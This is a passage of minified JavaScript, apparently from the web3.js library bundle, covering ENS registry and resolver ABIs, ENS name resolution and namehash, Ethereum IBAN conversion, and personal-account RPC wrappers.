                        to: s.address,
                        gas: s.gas,
                        gasPrice: s.gasPrice,
                        from: s.from,
                        input: s.input,
                        maxPriorityFeePerGas: s.maxPriorityFeePerGas,
                        maxFeePerGas: s.maxFeePerGas
                    }, r);
                    return a.input && "constructor" !== e.type || (a = Object.assign(Object.assign({}, a), {
                        input: (0, o.encodeMethodABI)(e, t, a.input)
                    })), a;
                };
            },
            6919: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.ENSRegistryAbi = void 0, t.ENSRegistryAbi = [
                    {
                        anonymous: !1,
                        inputs: [
                            {
                                indexed: !0,
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            },
                            {
                                indexed: !0,
                                internalType: "bytes32",
                                name: "label",
                                type: "bytes32"
                            },
                            {
                                indexed: !1,
                                internalType: "address",
                                name: "owner",
                                type: "address"
                            }
                        ],
                        name: "NewOwner",
                        type: "event"
                    },
                    {
                        anonymous: !1,
                        inputs: [
                            {
                                indexed: !0,
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            },
                            {
                                indexed: !1,
                                internalType: "address",
                                name: "resolver",
                                type: "address"
                            }
                        ],
                        name: "NewResolver",
                        type: "event"
                    },
                    {
                        anonymous: !1,
                        inputs: [
                            {
                                indexed: !0,
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            },
                            {
                                indexed: !1,
                                internalType: "address",
                                name: "owner",
                                type: "address"
                            }
                        ],
                        name: "Transfer",
                        type: "event"
                    },
                    {
                        inputs: [
                            {
                                internalType: "address",
                                name: "owner",
                                type: "address"
                            },
                            {
                                internalType: "address",
                                name: "operator",
                                type: "address"
                            }
                        ],
                        name: "isApprovedForAll",
                        outputs: [
                            {
                                internalType: "bool",
                                name: "",
                                type: "bool"
                            }
                        ],
                        stateMutability: "view",
                        type: "function"
                    },
                    {
                        inputs: [
                            {
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            }
                        ],
                        name: "owner",
                        outputs: [
                            {
                                internalType: "address",
                                name: "",
                                type: "address"
                            }
                        ],
                        stateMutability: "view",
                        type: "function"
                    },
                    {
                        inputs: [
                            {
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            }
                        ],
                        name: "recordExists",
                        outputs: [
                            {
                                internalType: "bool",
                                name: "",
                                type: "bool"
                            }
                        ],
                        stateMutability: "view",
                        type: "function"
                    },
                    {
                        inputs: [
                            {
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            }
                        ],
                        name: "resolver",
                        outputs: [
                            {
                                internalType: "address",
                                name: "",
                                type: "address"
                            }
                        ],
                        stateMutability: "view",
                        type: "function"
                    },
                    {
                        inputs: [
                            {
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            }
                        ],
                        name: "ttl",
                        outputs: [
                            {
                                internalType: "uint64",
                                name: "",
                                type: "uint64"
                            }
                        ],
                        stateMutability: "view",
                        type: "function"
                    }
                ];
            },
            172: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.PublicResolverAbi = void 0, t.PublicResolverAbi = [
                    {
                        anonymous: !1,
                        inputs: [
                            {
                                indexed: !0,
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            },
                            {
                                indexed: !1,
                                internalType: "address",
                                name: "a",
                                type: "address"
                            }
                        ],
                        name: "AddrChanged",
                        type: "event"
                    },
                    {
                        anonymous: !1,
                        inputs: [
                            {
                                indexed: !0,
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            },
                            {
                                indexed: !1,
                                internalType: "uint256",
                                name: "coinType",
                                type: "uint256"
                            },
                            {
                                indexed: !1,
                                internalType: "bytes",
                                name: "newAddress",
                                type: "bytes"
                            }
                        ],
                        name: "AddressChanged",
                        type: "event"
                    },
                    {
                        anonymous: !1,
                        inputs: [
                            {
                                indexed: !0,
                                internalType: "address",
                                name: "owner",
                                type: "address"
                            },
                            {
                                indexed: !0,
                                internalType: "address",
                                name: "operator",
                                type: "address"
                            },
                            {
                                indexed: !1,
                                internalType: "bool",
                                name: "approved",
                                type: "bool"
                            }
                        ],
                        name: "ApprovalForAll",
                        type: "event"
                    },
                    {
                        anonymous: !1,
                        inputs: [
                            {
                                indexed: !0,
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            },
                            {
                                indexed: !1,
                                internalType: "bytes",
                                name: "hash",
                                type: "bytes"
                            }
                        ],
                        name: "ContenthashChanged",
                        type: "event"
                    },
                    {
                        anonymous: !1,
                        inputs: [
                            {
                                indexed: !0,
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            },
                            {
                                indexed: !1,
                                internalType: "bytes",
                                name: "name",
                                type: "bytes"
                            },
                            {
                                indexed: !1,
                                internalType: "uint16",
                                name: "resource",
                                type: "uint16"
                            },
                            {
                                indexed: !1,
                                internalType: "bytes",
                                name: "record",
                                type: "bytes"
                            }
                        ],
                        name: "DNSRecordChanged",
                        type: "event"
                    },
                    {
                        anonymous: !1,
                        inputs: [
                            {
                                indexed: !0,
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            },
                            {
                                indexed: !1,
                                internalType: "bytes",
                                name: "name",
                                type: "bytes"
                            },
                            {
                                indexed: !1,
                                internalType: "uint16",
                                name: "resource",
                                type: "uint16"
                            }
                        ],
                        name: "DNSRecordDeleted",
                        type: "event"
                    },
                    {
                        anonymous: !1,
                        inputs: [
                            {
                                indexed: !0,
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            }
                        ],
                        name: "DNSZoneCleared",
                        type: "event"
                    },
                    {
                        anonymous: !1,
                        inputs: [
                            {
                                indexed: !0,
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            },
                            {
                                indexed: !1,
                                internalType: "bytes",
                                name: "lastzonehash",
                                type: "bytes"
                            },
                            {
                                indexed: !1,
                                internalType: "bytes",
                                name: "zonehash",
                                type: "bytes"
                            }
                        ],
                        name: "DNSZonehashChanged",
                        type: "event"
                    },
                    {
                        anonymous: !1,
                        inputs: [
                            {
                                indexed: !0,
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            },
                            {
                                indexed: !0,
                                internalType: "bytes4",
                                name: "interfaceID",
                                type: "bytes4"
                            },
                            {
                                indexed: !1,
                                internalType: "address",
                                name: "implementer",
                                type: "address"
                            }
                        ],
                        name: "InterfaceChanged",
                        type: "event"
                    },
                    {
                        anonymous: !1,
                        inputs: [
                            {
                                indexed: !0,
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            },
                            {
                                indexed: !1,
                                internalType: "string",
                                name: "name",
                                type: "string"
                            }
                        ],
                        name: "NameChanged",
                        type: "event"
                    },
                    {
                        anonymous: !1,
                        inputs: [
                            {
                                indexed: !0,
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            },
                            {
                                indexed: !1,
                                internalType: "bytes32",
                                name: "x",
                                type: "bytes32"
                            },
                            {
                                indexed: !1,
                                internalType: "bytes32",
                                name: "y",
                                type: "bytes32"
                            }
                        ],
                        name: "PubkeyChanged",
                        type: "event"
                    },
                    {
                        anonymous: !1,
                        inputs: [
                            {
                                indexed: !0,
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            },
                            {
                                indexed: !0,
                                internalType: "string",
                                name: "indexedKey",
                                type: "string"
                            },
                            {
                                indexed: !1,
                                internalType: "string",
                                name: "key",
                                type: "string"
                            }
                        ],
                        name: "TextChanged",
                        type: "event"
                    },
                    {
                        inputs: [
                            {
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            },
                            {
                                internalType: "uint256",
                                name: "contentTypes",
                                type: "uint256"
                            }
                        ],
                        name: "ABI",
                        outputs: [
                            {
                                internalType: "uint256",
                                name: "",
                                type: "uint256"
                            },
                            {
                                internalType: "bytes",
                                name: "",
                                type: "bytes"
                            }
                        ],
                        stateMutability: "view",
                        type: "function"
                    },
                    {
                        inputs: [
                            {
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            }
                        ],
                        name: "addr",
                        outputs: [
                            {
                                internalType: "address payable",
                                name: "",
                                type: "address"
                            }
                        ],
                        stateMutability: "view",
                        type: "function"
                    },
                    {
                        inputs: [
                            {
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            },
                            {
                                internalType: "uint256",
                                name: "coinType",
                                type: "uint256"
                            }
                        ],
                        name: "addr",
                        outputs: [
                            {
                                internalType: "bytes",
                                name: "",
                                type: "bytes"
                            }
                        ],
                        stateMutability: "view",
                        type: "function"
                    },
                    {
                        inputs: [
                            {
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            }
                        ],
                        name: "contenthash",
                        outputs: [
                            {
                                internalType: "bytes",
                                name: "",
                                type: "bytes"
                            }
                        ],
                        stateMutability: "view",
                        type: "function"
                    },
                    {
                        inputs: [
                            {
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            },
                            {
                                internalType: "bytes32",
                                name: "name",
                                type: "bytes32"
                            },
                            {
                                internalType: "uint16",
                                name: "resource",
                                type: "uint16"
                            }
                        ],
                        name: "dnsRecord",
                        outputs: [
                            {
                                internalType: "bytes",
                                name: "",
                                type: "bytes"
                            }
                        ],
                        stateMutability: "view",
                        type: "function"
                    },
                    {
                        inputs: [
                            {
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            },
                            {
                                internalType: "bytes32",
                                name: "name",
                                type: "bytes32"
                            }
                        ],
                        name: "hasDNSRecords",
                        outputs: [
                            {
                                internalType: "bool",
                                name: "",
                                type: "bool"
                            }
                        ],
                        stateMutability: "view",
                        type: "function"
                    },
                    {
                        inputs: [
                            {
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            },
                            {
                                internalType: "bytes4",
                                name: "interfaceID",
                                type: "bytes4"
                            }
                        ],
                        name: "interfaceImplementer",
                        outputs: [
                            {
                                internalType: "address",
                                name: "",
                                type: "address"
                            }
                        ],
                        stateMutability: "view",
                        type: "function"
                    },
                    {
                        inputs: [
                            {
                                internalType: "address",
                                name: "account",
                                type: "address"
                            },
                            {
                                internalType: "address",
                                name: "operator",
                                type: "address"
                            }
                        ],
                        name: "isApprovedForAll",
                        outputs: [
                            {
                                internalType: "bool",
                                name: "",
                                type: "bool"
                            }
                        ],
                        stateMutability: "view",
                        type: "function"
                    },
                    {
                        inputs: [
                            {
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            }
                        ],
                        name: "name",
                        outputs: [
                            {
                                internalType: "string",
                                name: "",
                                type: "string"
                            }
                        ],
                        stateMutability: "view",
                        type: "function"
                    },
                    {
                        inputs: [
                            {
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            }
                        ],
                        name: "pubkey",
                        outputs: [
                            {
                                internalType: "bytes32",
                                name: "x",
                                type: "bytes32"
                            },
                            {
                                internalType: "bytes32",
                                name: "y",
                                type: "bytes32"
                            }
                        ],
                        stateMutability: "view",
                        type: "function"
                    },
                    {
                        inputs: [
                            {
                                internalType: "bytes4",
                                name: "interfaceID",
                                type: "bytes4"
                            }
                        ],
                        name: "supportsInterface",
                        outputs: [
                            {
                                internalType: "bool",
                                name: "",
                                type: "bool"
                            }
                        ],
                        stateMutability: "view",
                        type: "function"
                    },
                    {
                        inputs: [
                            {
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            },
                            {
                                internalType: "string",
                                name: "key",
                                type: "string"
                            }
                        ],
                        name: "text",
                        outputs: [
                            {
                                internalType: "string",
                                name: "",
                                type: "string"
                            }
                        ],
                        stateMutability: "view",
                        type: "function"
                    },
                    {
                        inputs: [
                            {
                                internalType: "bytes32",
                                name: "node",
                                type: "bytes32"
                            }
                        ],
                        name: "zonehash",
                        outputs: [
                            {
                                internalType: "bytes",
                                name: "",
                                type: "bytes"
                            }
                        ],
                        stateMutability: "view",
                        type: "function"
                    }
                ];
            },
            8677: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.networkIds = t.registryAddresses = t.methodsInInterface = t.interfaceIds = void 0, t.interfaceIds = {
                    addr: "0x3b3b57de",
                    name: "0x691f3431",
                    abi: "0x2203ab56",
                    pubkey: "0xc8690233",
                    text: "0x59d1d43c",
                    contenthash: "0xbc1c58d1"
                }, t.methodsInInterface = {
                    setAddr: "addr",
                    addr: "addr",
                    setPubkey: "pubkey",
                    pubkey: "pubkey",
                    setContenthash: "contenthash",
                    contenthash: "contenthash"
                }, t.registryAddresses = {
                    main: "0x00000000000C2E074eC69A0dFb2997BA6C7d2e1e",
                    goerli: "0x00000000000C2E074eC69A0dFb2997BA6C7d2e1e"
                }, t.networkIds = {
                    "0x1": "main",
                    "0x5": "goerli"
                };
            },
            9142: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.ENS = void 0;
                const i = r(6527), o = r(5071), s = r(6637), a = r(9820), u = r(9970), c = r(8677), l = r(67), d = r(8067);
                class h extends i.Web3Context {
                    constructor(e, t){
                        super(null != t ? t : ""), this.registryAddress = null != e ? e : c.registryAddresses.main, this._registry = new l.Registry(this.getContextObject(), e), this._resolver = new d.Resolver(this._registry);
                    }
                    getResolver(e) {
                        return n(this, void 0, void 0, function*() {
                            return this._registry.getResolver(e);
                        });
                    }
                    recordExists(e) {
                        return n(this, void 0, void 0, function*() {
                            return this._registry.recordExists(e);
                        });
                    }
                    getTTL(e) {
                        return n(this, void 0, void 0, function*() {
                            return this._registry.getTTL(e);
                        });
                    }
                    getOwner(e) {
                        return n(this, void 0, void 0, function*() {
                            return this._registry.getOwner(e);
                        });
                    }
                    getAddress(e, t = 60) {
                        return n(this, void 0, void 0, function*() {
                            return this._resolver.getAddress(e, t);
                        });
                    }
                    getPubkey(e) {
                        return n(this, void 0, void 0, function*() {
                            return this._resolver.getPubkey(e);
                        });
                    }
                    getContenthash(e) {
                        return n(this, void 0, void 0, function*() {
                            return this._resolver.getContenthash(e);
                        });
                    }
                    checkNetwork() {
                        return n(this, void 0, void 0, function*() {
                            const e = Date.now() / 1e3;
                            if (!this._lastSyncCheck || e - this._lastSyncCheck > 3600) {
                                const t = yield (0, s.isSyncing)(this);
                                if ("boolean" != typeof t || t) throw new o.ENSNetworkNotSyncedError;
                                this._lastSyncCheck = e;
                            }
                            if (this._detectedAddress) return this._detectedAddress;
                            const t = yield (0, a.getId)(this, Object.assign(Object.assign({}, u.DEFAULT_RETURN_FORMAT), {
                                number: u.FMT_NUMBER.HEX
                            })), r = c.registryAddresses[c.networkIds[t]];
                            if (void 0 === r) throw new o.ENSUnsupportedNetworkError(t);
                            return this._detectedAddress = r, this._detectedAddress;
                        });
                    }
                    supportsInterface(e, t) {
                        return n(this, void 0, void 0, function*() {
                            return this._resolver.supportsInterface(e, t);
                        });
                    }
                    get events() {
                        return this._registry.events;
                    }
                }
                t.ENS = h;
            },
            1698: function(e, t, r) {
                "use strict";
                var n = this && this.__createBinding || (Object.create ? function(e, t, r, n) {
                    void 0 === n && (n = r);
                    var i = Object.getOwnPropertyDescriptor(t, r);
                    i && !("get" in i ? !t.__esModule : i.writable || i.configurable) || (i = {
                        enumerable: !0,
                        get: function() {
                            return t[r];
                        }
                    }), Object.defineProperty(e, n, i);
                } : function(e, t, r, n) {
                    void 0 === n && (n = r), e[n] = t[r];
                }), i = this && this.__exportStar || function(e, t) {
                    for(var r in e)"default" === r || Object.prototype.hasOwnProperty.call(t, r) || n(t, e, r);
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.registryAddresses = void 0;
                const o = r(8677);
                Object.defineProperty(t, "registryAddresses", {
                    enumerable: !0,
                    get: function() {
                        return o.registryAddresses;
                    }
                }), i(r(9142), t);
            },
            67: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Registry = void 0;
                const i = r(3211), o = r(6919), s = r(172), a = r(8677), u = r(8196);
                t.Registry = class {
                    constructor(e, t){
                        this.contract = new i.Contract(o.ENSRegistryAbi, null != t ? t : a.registryAddresses.main, e), this.context = e;
                    }
                    getOwner(e) {
                        return n(this, void 0, void 0, function*() {
                            try {
                                return this.contract.methods.owner((0, u.namehash)(e)).call();
                            } catch (e) {
                                throw new Error;
                            }
                        });
                    }
                    getTTL(e) {
                        return n(this, void 0, void 0, function*() {
                            try {
                                return this.contract.methods.ttl((0, u.namehash)(e)).call();
                            } catch (e) {
                                throw new Error;
                            }
                        });
                    }
                    recordExists(e) {
                        return n(this, void 0, void 0, function*() {
                            try {
                                return this.contract.methods.recordExists((0, u.namehash)(e)).call();
                            } catch (e) {
                                throw new Error;
                            }
                        });
                    }
                    getResolver(e) {
                        return n(this, void 0, void 0, function*() {
                            try {
                                return this.contract.methods.resolver((0, u.namehash)(e)).call().then((e)=>{
                                    if ("string" == typeof e) return new i.Contract(s.PublicResolverAbi, e, this.context);
                                    throw new Error;
                                });
                            } catch (e) {
                                throw new Error;
                            }
                        });
                    }
                    get events() {
                        return this.contract.events;
                    }
                };
            },
            8067: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Resolver = void 0;
                const i = r(5071), o = r(9634), s = r(7345), a = r(8677), u = r(8196);
                t.Resolver = class {
                    constructor(e){
                        this.registry = e;
                    }
                    getResolverContractAdapter(e) {
                        return n(this, void 0, void 0, function*() {
                            return this.registry.getResolver(e);
                        });
                    }
                    checkInterfaceSupport(e, t) {
                        var r, s;
                        return n(this, void 0, void 0, function*() {
                            if ((0, o.isNullish)(a.interfaceIds[t])) throw new i.ResolverMethodMissingError(null !== (r = e.options.address) && void 0 !== r ? r : "", t);
                            if (!(yield e.methods.supportsInterface(a.interfaceIds[t]).call())) throw new i.ResolverMethodMissingError(null !== (s = e.options.address) && void 0 !== s ? s : "", t);
                        });
                    }
                    supportsInterface(e, t) {
                        var r;
                        return n(this, void 0, void 0, function*() {
                            const n = yield this.getResolverContractAdapter(e);
                            let i = t;
                            if (!(0, s.isHexStrict)(i)) {
                                if (i = null !== (r = (0, o.sha3)(t)) && void 0 !== r ? r : "", "" === t) throw new Error("Invalid interface Id");
                                i = i.slice(0, 10);
                            }
                            return n.methods.supportsInterface(i).call();
                        });
                    }
                    getAddress(e, t = 60) {
                        return n(this, void 0, void 0, function*() {
                            const r = yield this.getResolverContractAdapter(e);
                            return yield this.checkInterfaceSupport(r, a.methodsInInterface.addr), r.methods.addr((0, u.namehash)(e), t).call();
                        });
                    }
                    getPubkey(e) {
                        return n(this, void 0, void 0, function*() {
                            const t = yield this.getResolverContractAdapter(e);
                            return yield this.checkInterfaceSupport(t, a.methodsInInterface.pubkey), t.methods.pubkey((0, u.namehash)(e)).call();
                        });
                    }
                    getContenthash(e) {
                        return n(this, void 0, void 0, function*() {
                            const t = yield this.getResolverContractAdapter(e);
                            return yield this.checkInterfaceSupport(t, a.methodsInInterface.contenthash), t.methods.contenthash((0, u.namehash)(e)).call();
                        });
                    }
                };
            },
            8196: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.namehash = t.normalize = void 0;
                const n = r(9634), i = r(6608);
                t.normalize = (e)=>(0, i.ens_normalize)(e), t.namehash = (e)=>{
                    let r = "";
                    for(let e = 0; e < 32; e += 1)r += "00";
                    if (e) {
                        const i = (0, t.normalize)(e).split(".");
                        for(let e = i.length - 1; e >= 0; e -= 1){
                            const t = (0, n.sha3Raw)(i[e]).slice(2);
                            r = (0, n.sha3Raw)(`0x${r}${t}`).slice(2);
                        }
                    }
                    return `0x${r}`;
                };
            },
            5609: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Iban = void 0;
                const n = r(9634), i = r(7345), o = r(5071);
                class s {
                    constructor(e){
                        if (this.toAddress = ()=>{
                            if (this.isDirect()) {
                                const e = this._iban.slice(4), t = s._parseInt(e, 36), r = (0, n.leftPad)(t, 40);
                                return (0, n.toChecksumAddress)(r);
                            }
                            throw new Error("Iban is indirect and cannot be converted. Must be length of 34 or 35");
                        }, !s.isIndirect(e) && !s.isDirect(e)) throw new Error("Invalid IBAN was provided");
                        this._iban = e;
                    }
                    static isDirect(e) {
                        return 34 === e.length || 35 === e.length;
                    }
                    isDirect() {
                        return s.isDirect(this._iban);
                    }
                    static isIndirect(e) {
                        return 20 === e.length;
                    }
                    isIndirect() {
                        return s.isIndirect(this._iban);
                    }
                    static isValid(e) {
                        return /^XE[0-9]{2}(ETH[0-9A-Z]{13}|[0-9A-Z]{30,31})$/.test(e) && 1 === s._mod9710(s._iso13616Prepare(e));
                    }
                    isValid() {
                        return s.isValid(this._iban);
                    }
                    static fromBban(e) {
                        const t = `0${(98 - this._mod9710(this._iso13616Prepare(`XE00${e}`))).toString()}`.slice(-2);
                        return new s(`XE${t}${e}`);
                    }
                    static createIndirect(e) {
                        return s.fromBban(`ETH${e.institution}${e.identifier}`);
                    }
                    static fromAddress(e) {
                        if (!(0, i.isAddress)(e)) throw new o.InvalidAddressError(e);
                        const t = BigInt((0, n.hexToNumber)(e)).toString(36), r = (0, n.leftPad)(t, 15);
                        return s.fromBban(r.toUpperCase());
                    }
                    static toIban(e) {
                        return s.fromAddress(e).toString();
                    }
                    client() {
                        return this.isIndirect() ? this._iban.slice(11) : "";
                    }
                    checksum() {
                        return this._iban.slice(2, 4);
                    }
                    institution() {
                        return this.isIndirect() ? this._iban.slice(7, 11) : "";
                    }
                    toString() {
                        return this._iban;
                    }
                }
                t.Iban = s, s._iso13616Prepare = (e)=>{
                    const t = "A".charCodeAt(0), r = "Z".charCodeAt(0), n = e.toUpperCase();
                    return `${n.slice(4)}${n.slice(0, 4)}`.split("").map((e)=>{
                        const n = e.charCodeAt(0);
                        return n >= t && n <= r ? n - t + 10 : e;
                    }).join("");
                }, s._parseInt = (e, t)=>[
                        ...e
                    ].reduce((e, r)=>BigInt(parseInt(r, t)) + BigInt(t) * e, BigInt(0)), s._mod9710 = (e)=>{
                    let t, r = e;
                    for(; r.length > 2;)t = r.slice(0, 9), r = `${(parseInt(t, 10) % 97).toString()}${r.slice(t.length)}`;
                    return parseInt(r, 10) % 97;
                }, s.toAddress = (e)=>new s(e).toAddress();
            },
            9910: function(e, t, r) {
                "use strict";
                var n = this && this.__createBinding || (Object.create ? function(e, t, r, n) {
                    void 0 === n && (n = r);
                    var i = Object.getOwnPropertyDescriptor(t, r);
                    i && !("get" in i ? !t.__esModule : i.writable || i.configurable) || (i = {
                        enumerable: !0,
                        get: function() {
                            return t[r];
                        }
                    }), Object.defineProperty(e, n, i);
                } : function(e, t, r, n) {
                    void 0 === n && (n = r), e[n] = t[r];
                }), i = this && this.__exportStar || function(e, t) {
                    for(var r in e)"default" === r || Object.prototype.hasOwnProperty.call(t, r) || n(t, e, r);
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
                const o = r(5609);
                i(r(5609), t), i(r(1965), t), t.default = o.Iban;
            },
            1965: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
            },
            9757: function(e, t, r) {
                "use strict";
                var n = this && this.__createBinding || (Object.create ? function(e, t, r, n) {
                    void 0 === n && (n = r);
                    var i = Object.getOwnPropertyDescriptor(t, r);
                    i && !("get" in i ? !t.__esModule : i.writable || i.configurable) || (i = {
                        enumerable: !0,
                        get: function() {
                            return t[r];
                        }
                    }), Object.defineProperty(e, n, i);
                } : function(e, t, r, n) {
                    void 0 === n && (n = r), e[n] = t[r];
                }), i = this && this.__exportStar || function(e, t) {
                    for(var r in e)"default" === r || Object.prototype.hasOwnProperty.call(t, r) || n(t, e, r);
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
                const o = r(9638);
                i(r(9638), t), t.default = o.Personal;
            },
            9638: function(e, t, r) {
                "use strict";
                var n = this && this.__createBinding || (Object.create ? function(e, t, r, n) {
                    void 0 === n && (n = r);
                    var i = Object.getOwnPropertyDescriptor(t, r);
                    i && !("get" in i ? !t.__esModule : i.writable || i.configurable) || (i = {
                        enumerable: !0,
                        get: function() {
                            return t[r];
                        }
                    }), Object.defineProperty(e, n, i);
                } : function(e, t, r, n) {
                    void 0 === n && (n = r), e[n] = t[r];
                }), i = this && this.__setModuleDefault || (Object.create ? function(e, t) {
                    Object.defineProperty(e, "default", {
                        enumerable: !0,
                        value: t
                    });
                } : function(e, t) {
                    e.default = t;
                }), o = this && this.__importStar || function(e) {
                    if (e && e.__esModule) return e;
                    var t = {};
                    if (null != e) for(var r in e)"default" !== r && Object.prototype.hasOwnProperty.call(e, r) && n(t, e, r);
                    return i(t, e), t;
                }, s = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Personal = void 0;
                const a = r(6527), u = o(r(706));
                class c extends a.Web3Context {
                    getAccounts() {
                        return s(this, void 0, void 0, function*() {
                            return u.getAccounts(this.requestManager);
                        });
                    }
                    newAccount(e) {
                        return s(this, void 0, void 0, function*() {
                            return u.newAccount(this.requestManager, e);
                        });
                    }
                    unlockAccount(e, t, r) {
                        return s(this, void 0, void 0, function*() {
                            return u.unlockAccount(this.requestManager, e, t, r);
                        });
                    }
                    lockAccount(e) {
                        return s(this, void 0, void 0, function*() {
                            return u.lockAccount(this.requestManager, e);
                        });
                    }
                    importRawKey(e, t) {
                        return s(this, void 0, void 0, function*() {
                            return u.importRawKey(this.requestManager, e, t);
                        });
                    }
                    sendTransaction(e, t) {
                        return s(this, void 0, void 0, function*() {
                            return u.sendTransaction(this.requestManager, e, t);
                        });
                    }
                    signTransaction(e, t) {
                        return s(this, void 0, void 0, function*() {
                            return u.signTransaction(this.requestManager, e, t);
                        });
                    }
                    sign(e, t, r) {
                        return s(this, void 0, void 0, function*() {
                            return u.sign(this.requestManager, e, t, r);
                        });
                    }
                    ecRecover(e, t) {
                        return s(this, void 0, void 0, function*() {
                            return u.ecRecover(this.requestManager, e, t);
                        });
                    }
                }
                t.Personal = c;
            },
            706: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.ecRecover = t.sign = t.signTransaction = t.sendTransaction = t.importRawKey = t.lockAccount = t.unlockAccount = t.newAccount = t.getAccounts = void 0;
                const i = r(9634), o = r(6637), s = r(9970), a = r(7345), u = r(1181);
                t.getAccounts = (e)=>n(void 0, void 0, void 0, function*() {
                        return (yield u.personalRpcMethods.getAccounts(e)).map(i.toChecksumAddress);
                    }), t.newAccount = (e, t)=>n(void 0, void 0, void 0, function*() {
                        a.validator.validate([
                            "string"
                        ], [
                            t
                        ]);
                        const r = yield u.personalRpcMethods.newAccount(e, t);
                        return (0, i.toChecksumAddress)(r);
                    }), t.unlockAccount = (e, t, r, i)=>n(void 0, void 0, void 0, function*() {
                        return a.validator.validate([
                            "address",
                            "string",
                            "uint"
                        ], [
                            t,
                            r,
                            i
                        ]), u.personalRpcMethods.unlockAccount(e, t, r, i);
                    }), t.lockAccount = (e, t)=>n(void 0, void 0, void 0, function*() {
                        return a.validator.validate([
                            "address"
                        ], [
                            t
                        ]), u.personalRpcMethods.lockAccount(e, t);
                    }), t.importRawKey = (e, t, r)=>n(void 0, void 0, void 0, function*() {
